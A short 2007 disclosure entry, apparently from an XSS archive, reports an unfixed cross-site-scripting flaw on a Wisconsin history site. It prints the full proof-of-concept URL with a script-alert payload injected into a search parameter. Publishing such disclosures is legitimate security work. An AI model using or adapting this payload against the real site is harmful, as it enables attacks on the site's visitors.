Security researcher ratakurex, has submitted on 21/09/2007 a cross-site-scripting (XSS) vulnerability affecting content.wisconsinhistory.org, which at the time of submission ranked 203186 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 22/09/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 21/09/2007 |
Date published: 22/09/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: ratakurex |
Domain: content.wisconsinhistory.org |
Category: XSS |
Pagerank: 203186 |
URL: http://content.wisconsinhistory.org/cdm4/results_aj.php?CISOBOX1=<script>alert('ratakurex')</script> &Submit=Search&CISOOP1=all&CISOFIELD1=CISOSEARCHALL&CISORESTMP=/cdm4/results_aj.php&CISOVIEWTMP=/cdm 4/item_viewer.php&CISOMODE=grid&CISOGRID=docume,A,1;titla,A,1;creato,A,0;documb,200,0;none,A,0;20;ex tra5,none,none,none,none&CISOBIB=title,A,1,N;extra5,A,0,N;docume,200,0,N;none,A,0,N;none,A,0,N;20;ex tra5,none,none,none,none&CISOTHUMB=20+(4x5);extra5,none,none,none,none&CISOTITLE=20;extra5,none,none ,none,none&CISOHIERA=20;docume,extra5,none,none,none&CISOSUPPRESS=0&CISOROOT=/aj |
Click here to view the mirror
|
|